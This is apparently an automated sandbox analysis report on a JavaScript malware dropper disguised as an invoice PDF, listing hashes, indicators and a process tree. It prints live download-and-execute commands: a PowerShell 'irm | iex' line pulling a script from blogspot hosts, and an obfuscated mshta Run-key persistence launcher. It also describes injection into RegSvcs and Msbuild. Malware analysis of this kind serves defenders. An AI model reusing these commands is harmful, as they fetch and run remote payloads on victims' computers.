Analysis
-
max time kernel
138s -
max time network
115s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
06-05-2024 06:21
Static task
static1
Behavioral task
behavioral1
Sample
lnvoice-1205700442.pdf (4).js
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
lnvoice-1205700442.pdf (4).js
Resource
win10v2004-20240419-en
General
-
Target
lnvoice-1205700442.pdf (4).js
-
Size
1.8MB
-
MD5
fffee7bcbf8f724b68d02ebe0c5a133b
-
SHA1
739696c36214a1a37f382b4da835ba44d2665027
-
SHA256
b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8
-
SHA512
3f2bd2aa6b5cb22aa0c2042fa3af032c83b55f7e5407344cdb502abaf33b3e42d2e0073540226e6a8f3e09f3495ddbc339bfa29a38e420f11583632aa55fe8f4
-
SSDEEP
768:cNWDuYelMVBbnPOgADSb8O/b64/jWsYOS+Hu8N0RNta7SuHiHwdcU6AH6xgO:JewBbnPOgnh/6OSAuNA6H9AH83
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 8 1928 powershell.exe 9 1928 powershell.exe 16 1928 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation wscript.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral2/memory/3752-28-0x0000000000E00000-0x0000000000E86000-memory.dmp agile_net -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bookignr2 = "mshta \"javascript:er=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlmay5-24.blogspot.com/hehe | iex);Start-Sleep -Seconds 5;','run']; sj=[er[3],er[0],er[1],er[2]]; new ActiveXObject(sj[2])[sj[0]](sj[3], 0, true);close();new ActiveXObject(sj[1]).DeleteFile(WScript.ScriptFullName);\"\n" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bookignr1 = "schtasks /run /tn Bookignr1" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 38 api.ipify.org 39 api.ipify.org 40 ip-api.com -
Suspicious use of SetThreadContext 6 IoCs
Processes:
powershell.exedescription pid process target process PID 1928 set thread context of 928 1928 powershell.exe RegSvcs.exe PID 1928 set thread context of 3752 1928 powershell.exe RegSvcs.exe PID 1928 set thread context of 2068 1928 powershell.exe RegSvcs.exe PID 1928 set thread context of 2424 1928 powershell.exe RegSvcs.exe PID 1928 set thread context of 2248 1928 powershell.exe Msbuild.exe PID 1928 set thread context of 1584 1928 powershell.exe Msbuild.exe -
Drops file in Windows directory 1 IoCs
Processes:
dw20.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedw20.exedw20.exedw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
Processes:
dw20.exedw20.exedw20.exedw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exeRegSvcs.exepid process 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 928 RegSvcs.exe 928 RegSvcs.exe 928 RegSvcs.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedw20.exedw20.exedw20.exedw20.exeRegSvcs.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 1928 powershell.exe Token: SeRestorePrivilege 3960 dw20.exe Token: SeBackupPrivilege 3960 dw20.exe Token: SeRestorePrivilege 3488 dw20.exe Token: SeBackupPrivilege 3488 dw20.exe Token: SeRestorePrivilege 4504 dw20.exe Token: SeBackupPrivilege 4504 dw20.exe Token: SeBackupPrivilege 3488 dw20.exe Token: SeBackupPrivilege 1000 dw20.exe Token: SeBackupPrivilege 4504 dw20.exe Token: SeBackupPrivilege 1000 dw20.exe Token: SeBackupPrivilege 1000 dw20.exe Token: SeBackupPrivilege 4504 dw20.exe Token: SeBackupPrivilege 1000 dw20.exe Token: SeBackupPrivilege 4504 dw20.exe Token: SeBackupPrivilege 4504 dw20.exe Token: SeBackupPrivilege 1000 dw20.exe Token: SeBackupPrivilege 3488 dw20.exe Token: SeBackupPrivilege 3488 dw20.exe Token: SeBackupPrivilege 4504 dw20.exe Token: SeBackupPrivilege 1000 dw20.exe Token: SeDebugPrivilege 928 RegSvcs.exe Token: SeDebugPrivilege 3752 RegSvcs.exe Token: SeBackupPrivilege 3960 dw20.exe Token: SeBackupPrivilege 3960 dw20.exe Token: SeIncreaseQuotaPrivilege 1928 powershell.exe Token: SeSecurityPrivilege 1928 powershell.exe Token: SeTakeOwnershipPrivilege 1928 powershell.exe Token: SeLoadDriverPrivilege 1928 powershell.exe Token: SeSystemProfilePrivilege 1928 powershell.exe Token: SeSystemtimePrivilege 1928 powershell.exe Token: SeProfSingleProcessPrivilege 1928 powershell.exe Token: SeIncBasePriorityPrivilege 1928 powershell.exe Token: SeCreatePagefilePrivilege 1928 powershell.exe Token: SeBackupPrivilege 1928 powershell.exe Token: SeRestorePrivilege 1928 powershell.exe Token: SeShutdownPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeSystemEnvironmentPrivilege 1928 powershell.exe Token: SeRemoteShutdownPrivilege 1928 powershell.exe Token: SeUndockPrivilege 1928 powershell.exe Token: SeManageVolumePrivilege 1928 powershell.exe Token: 33 1928 powershell.exe Token: 34 1928 powershell.exe Token: 35 1928 powershell.exe Token: 36 1928 powershell.exe Token: SeIncreaseQuotaPrivilege 1928 powershell.exe Token: SeSecurityPrivilege 1928 powershell.exe Token: SeTakeOwnershipPrivilege 1928 powershell.exe Token: SeLoadDriverPrivilege 1928 powershell.exe Token: SeSystemProfilePrivilege 1928 powershell.exe Token: SeSystemtimePrivilege 1928 powershell.exe Token: SeProfSingleProcessPrivilege 1928 powershell.exe Token: SeIncBasePriorityPrivilege 1928 powershell.exe Token: SeCreatePagefilePrivilege 1928 powershell.exe Token: SeBackupPrivilege 1928 powershell.exe Token: SeRestorePrivilege 1928 powershell.exe Token: SeShutdownPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeSystemEnvironmentPrivilege 1928 powershell.exe Token: SeRemoteShutdownPrivilege 1928 powershell.exe Token: SeUndockPrivilege 1928 powershell.exe Token: SeManageVolumePrivilege 1928 powershell.exe Token: 33 1928 powershell.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
wscript.exepowershell.exeMsbuild.exeRegSvcs.exeMsbuild.exeRegSvcs.exedescription pid process target process PID 4140 wrote to memory of 1928 4140 wscript.exe powershell.exe PID 4140 wrote to memory of 1928 4140 wscript.exe powershell.exe PID 1928 wrote to memory of 928 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 928 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 928 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 928 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 928 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 928 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 928 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 928 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 3752 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 3752 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 3752 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 3752 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 3752 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 3752 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 3752 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 3752 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2068 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2068 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2068 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2068 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2068 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2068 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2068 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2068 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2424 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2424 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2424 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2424 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2424 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2424 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2424 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2424 1928 powershell.exe RegSvcs.exe PID 1928 wrote to memory of 2248 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 2248 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 2248 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 2248 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 2248 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 2248 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 2248 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 2248 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 1584 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 1584 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 1584 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 1584 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 1584 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 1584 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 1584 1928 powershell.exe Msbuild.exe PID 1928 wrote to memory of 1584 1928 powershell.exe Msbuild.exe PID 1584 wrote to memory of 3488 1584 Msbuild.exe dw20.exe PID 1584 wrote to memory of 3488 1584 Msbuild.exe dw20.exe PID 1584 wrote to memory of 3488 1584 Msbuild.exe dw20.exe PID 2068 wrote to memory of 3960 2068 RegSvcs.exe dw20.exe PID 2068 wrote to memory of 3960 2068 RegSvcs.exe dw20.exe PID 2068 wrote to memory of 3960 2068 RegSvcs.exe dw20.exe PID 2248 wrote to memory of 1000 2248 Msbuild.exe dw20.exe PID 2248 wrote to memory of 1000 2248 Msbuild.exe dw20.exe PID 2248 wrote to memory of 1000 2248 Msbuild.exe dw20.exe PID 2424 wrote to memory of 4504 2424 RegSvcs.exe dw20.exe PID 2424 wrote to memory of 4504 2424 RegSvcs.exe dw20.exe PID 2424 wrote to memory of 4504 2424 RegSvcs.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\lnvoice-1205700442.pdf (4).js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm mainhotel5may.blogspot.com//////////////////////hehehehe) | . iex;Start-Sleep -Seconds 3;2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3752 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3960 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7844⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4504 -
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1000 -
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7844⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3488
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD57977840a013180f8d13f7848bd7f30da
SHA190ae7f466a9dd562587fd3e12082095cd149e277
SHA25692f383524bcedb1f6dfb9dbbd2f9c9a296d3578828c4fdc4deab3050641be32d
SHA5124ac09d19650467ad2016d47d82fbf97e5c42a89b14829dfbc5c143779773e9f251c67c8ea1c9a4c070fe48981dc75c7e0b855708b23d3203a83bc279295fd262
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82